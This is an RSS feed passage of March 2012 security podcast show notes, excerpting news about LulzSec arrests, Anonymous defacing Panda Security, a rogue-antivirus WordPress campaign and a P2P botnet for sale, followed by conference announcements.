<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI claims that Mr Martyn (also known as &lsquo;pwnsauce&rsquo;, &#39;&lsquo;raepsauce&rsquo; and &lsquo;networkkitten&rsquo;) and the other defendants named in court papers, &ldquo;launched cyber attacks on, and gained unauthorised access to,&rdquo; the websites and computers of Fine Gael, Sony, internet security firm HBGary and Fox broadcasting.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.digitaljournal.com/article/320839"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.digitaljournal.com/article/320839</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has been at it again. This time in revenge for recent arrests. And while they were at it, they hit the Vatican too.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following Tuesday&#39;s arrest of members of the LulzSec collective, the hacktivist group, Anonymous has now attacked the anti-virus company Panda Security.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The arrests of six suspected members of Anonymous/LulzSec on Tuesday in the UK and US are reported to be the result of information handed over to the authorities by one of their leaders, Hector Xavier Monsegur, also known as Sabu, who had apparently been acting as a mole for the authorities last year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RT advised that following the arrests, Anonymous posted on its Twitter feed: &ldquo;LulzSec was a group, but Anonymous is a movement. Groups come and go, ideas remain.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The online assault attacked 25 websites belonging to the security company on Wednesday Night, plastering the websites with messages such as &quot;Love to LulzSec/Antisec fallen friends&quot;. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group also took emails, passwords and user names of over 100 Panda Security employees, which they subsequently posted on line.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivists claim that Panda Security was involved in the arrests of 25 people in Spain and Latin America in February, and they are accusing them of snitching to law enforcement organisations in exchange for money.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Anonymous is making claims that they have done far more than a defacement and they have actually back doored Panda A/V.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/vulnerability-management/167901026/security/news/232602207/rogue-av-campaign-infects-more-than-200-000-web-pages.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/vulnerability-management/167901026/security/news/232602207/rogue-av-campaign-infects-more-than-200-000-web-pages.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers at Websense have detected a widespread rogue antivirus campaign targeting more than 200,000 Web pages and close to 30,000 unique Web hosts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack has infected a massive number of websites with various versions of WordPress installed. When a victim visits one of the infected sites, he or she is redirected to a site hosting rogue antivirus. If the person downloads the program, then the Trojan will be installed onto their computer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It is difficult to estimate the number of users affected,&rdquo; explains Elad Sharf, lead senior security researcher at Websense Security Labs. &ldquo;What is interesting to note is that more than 85% of the compromised sites are in the United States, while visitors to these websites are more geographically dispersed. The attack may be specific to the U.S., but everyone is at risk when visiting these compromised pages.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Websense, the rogue AV site appears to run a scan on the computer and displays fake malware detections in a bid to trick the user into downloading the program. The page looks like a Windows Explorer window and has a &quot;Windows Security Alert&quot; dialogue box in it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Usually in this type of mass injections, vulnerabilities or security holes in certain versions and their accompanied infrastructure are abused to get initial access to those websites,&rdquo; Sharf says. &ldquo;Therefore after this access is maintained to the compromised website, the injected code keeps getting updated periodically, i.e., in every new cycle of the mass injection.&rdquo; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.infosecurity-magazine.com/view/24335/thor-a-new-p2p-botnet-for-sale/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecurity-magazine.com/view/24335/thor-a-new-p2p-botnet-for-sale/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new botnet is nearing completion and is being offered for sale on the hacking underground at $8000.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Botnets are networks of compromised computers under the control of a hacker or hacker group. They are primarily used to deliver huge amounts of spam or to direct a distributed denial of service (DDoS) attack against a particular target. They are traditionally based on a centralized architecture with a central command and control (C&amp;C) server commanding the individual compromised computers (bots). </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now a new botnet, named THOR and coded by TheGrimReap3r, is nearing completion and being offered for sale at $8000 on the criminal underground. THOR does not use a central C&amp;C. It has a decentralized architecture based on peer-to-peer (P2P) technology. P2P botnets are the latest innovation in the battle between whitehat security researchers and law enforcement agencies and the blackhat criminal underground. The &lsquo;weakness&rsquo; in the traditional centralized architecture,</span><a href="http://www.pandasecurity.com/%20www.pandasecurity.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Panda Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rsquo;s technical director Luis Corrons told </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosecurity</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, is that is not impossible to track down the C&amp;C server, and &ldquo;if you are able to shut it down you can kill the botnet (the bots will be there but the cybercriminal won&rsquo;t be able to control them).&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s Comments</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Flat screen TV&rsquo;s used to be expensive when they came out&#8230; &nbsp;I would expect prepackaged botnets like this to go through the same sorts of economic normalization as this becomes a more common occurance.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://tsaoutofourpants.wordpress.com/2012/03/06/1b-of-nude-body-scanners-made-worthless-by-blog-how-anyone-can-get-anything-past-the-tsas-nude-body-scanners/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://tsaoutofourpants.wordpress.com/2012/03/06/1b-of-nude-body-scanners-made-worthless-by-blog-how-anyone-can-get-anything-past-the-tsas-nude-body-scanners/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m publishing this video because I want the world to know how much danger the American Transportation Security Administration is putting all us all in with their haste to deploy the expensive, invasive nude body scanner program. When the machines came out, we were told that the invasion on our privacy, doses of radiation, and trashing of our Constitution were necessary because the old metal detectors weren&rsquo;t good enough. That &ldquo;non-metallic explosives&rdquo; were a threat, even though no one has boarded a plane in the US with any type of explosive in nearly 40 years. But while America was testing these devices, Rafi Sela, who ran security for Ben Gurion airport in Israel, which is known for being one of the most secure airports in the world, was quoted saying he could &ldquo;overcome the body scanners with enough explosives to take down a Boeing 747,&rdquo; and Ben Gurion therefore refused to buy scanners. The US ignored this warning, and Mr. Sela never publicly explained his statement. But it stuck with me.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-614-pwnedsauce-odd-targets-wormpress-fake-av-p2p-botnet-and-body-scanner-bypass/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3604/0/infosec-daily-podcast-episode-614.mp3" length="15026973" type="audio/mpeg" />
		<itunes:duration>0:31:15</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 614 for March 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	Whe[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 614 for March 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/certified-training/
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories

	Source: http://www.galwaynews.ie/24660-galway-hacker-faces-20-years-if-convicted
	A Claregalway man is facing the prospect of up to 20 years in a US prison after he was named this week by the FBI as a founder member of an international internet hacking group.
	Darren Martyn from Cloonbiggeen, Claregalway, is charged with two counts of computer hacking conspiracy &#8211; each conspiracy count carries a maximum sentence of ten years in prison.
	Mr Martyn is alleged by the FBI to be a member of &#8216;LulzSec&#8217;, a group of internet hackers that is a spin-off of the Anonymous hacking group. Both groups have launched numerous cyber attacks on high profile websites around the world.
	Mr Martyn, a biopharmaceutical chemistry student at NUI Galway and a past pupil of Calasanctius College, Oranmore, is listed in the FBI&#8217;s court papers as being 25, however, it is understood he is only 19 or 20.
	He along with four others, including one Offaly teenager Donncha O&#8217;Cearbhail (19), and three others in the UK and US, were charged this week in New York for computer hacking and other crimes.
	The FBI claims that Mr Martyn (also known as &#8216;pwnsauce&#8217;, &#39;&#8216;raepsauce&#8217; and &#8216;networkkitten&#8217;) and the other defendants named in court papers, &#8220;launched cyber attacks on, and gained unauthorised access to,&#8221; the websites and computers of Fine Gael, Sony, internet security firm HBGary and Fox broadcasting.
	&#8230;
	Source: http://www.digitaljournal.com/article/320839
	&#160;&#160;&#160; &#160;&#160;&#160; 
	Anonymous has been at it again. This time in revenge for recent arrests. And while they were at it, they hit the Vatican too.
	&#160;&#160;&#160; &#160;&#160;&#160; 
	Following Tuesday&#39;s arrest of members of the LulzSec collective, the hacktivist group, Anonymous has now attacked the anti-virus company Panda Security.
	The arrests of six suspected members of Anonymous/LulzSec on Tuesday in the UK and US[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 613 &#8211; DDoS, SWF Investigator, Sat/Cable Flaws, FBI Oops!, and Panda Slap</title>
		<link>http://www.isdpodcast.com/episode-613-ddos-swf-investigator-satcable-flaws-fbi-oops-and-panda-slap</link>
		<comments>http://www.isdpodcast.com/episode-613-ddos-swf-investigator-satcable-flaws-fbi-oops-and-panda-slap#comments</comments>
		<pubDate>Thu, 08 Mar 2012 00:38:35 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3599</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 613 for March 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD http://www.social-engineer.com/social-engineer-training InfoSec Southwest When: March 30-April 1 Where: Austin, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 613 for March 7, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
